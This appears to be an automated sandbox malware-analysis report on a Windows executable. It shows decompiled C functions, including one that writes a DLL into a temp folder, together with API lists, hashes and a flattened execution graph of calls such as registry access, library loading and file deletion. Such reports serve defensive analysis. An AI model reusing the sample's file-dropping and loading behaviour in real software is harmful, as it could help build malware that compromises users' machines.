                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Window$CallMessageProcSendVisible
                  • String ID:
                  • API String ID: 3748168415-3916222277
                  • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                  • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                  • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                  • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                  				int _t5;
                  				long _t7;
                  				struct _OVERLAPPED* _t11;
                  				intOrPtr* _t15;
                  				void* _t17;
                  				int _t21;
                  
                  				_t15 = __esi;
                  				_t11 = __ebx;
                  				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                  					_t7 = lstrlenA(E004029E8(0x11));
                  				} else {
                  					E004029CB(1);
                  					 *0x409f68 = __al;
                  				}
                  				if( *_t15 == _t11) {
                  					L8:
                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                  				} else {
                  					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll", _t7, _t17 + 8, _t11);
                  					_t21 = _t5;
                  					if(_t21 == 0) {
                  						goto L8;
                  					}
                  				}
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                  				return 0;
                  			}










                  APIs
                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                  Strings
                  • C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll, xrefs: 004024BC, 004024E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileWritelstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll
                  • API String ID: 427699356-170057338
                  • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                  • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                  • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                  • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004055BF(char* _a4) {
                  				char* _t3;
                  				char* _t5;
                  
                  				_t5 = _a4;
                  				_t3 =  &(_t5[lstrlenA(_t5)]);
                  				while( *_t3 != 0x5c) {
                  					_t3 = CharPrevA(_t5, _t3);
                  					if(_t3 > _t5) {
                  						continue;
                  					}
                  					break;
                  				}
                  				 *_t3 =  *_t3 & 0x00000000;
                  				return  &(_t3[1]);
                  			}






                  APIs
                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\kVijllv0Yl.exe,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 004055C5
                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\kVijllv0Yl.exe,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 004055D3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharPrevlstrlen
                  • String ID: C:\Users\user\Desktop
                  • API String ID: 2709904686-3125694417
                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                  • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                  • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004056D1(CHAR* _a4, CHAR* _a8) {
                  				int _t10;
                  				int _t15;
                  				CHAR* _t16;
                  
                  				_t15 = lstrlenA(_a8);
                  				_t16 = _a4;
                  				while(lstrlenA(_t16) >= _t15) {
                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                  					_t10 = lstrcmpiA(_t16, _a8);
                  					if(_t10 == 0) {
                  						return _t16;
                  					}
                  					_t16 = CharNextA(_t16);
                  				}
                  				return 0;
                  			}







                  APIs
                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: lstrlen$CharNextlstrcmpi
                  • String ID:
                  • API String ID: 190613189-0
                  • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                  • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                  • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                  • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:31.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.3%
                  Total number of Nodes:1846
                  Total number of Limit Nodes:97
8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 
9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 
9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 
9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 
9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 
10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 
10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 
410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 
407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 
10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 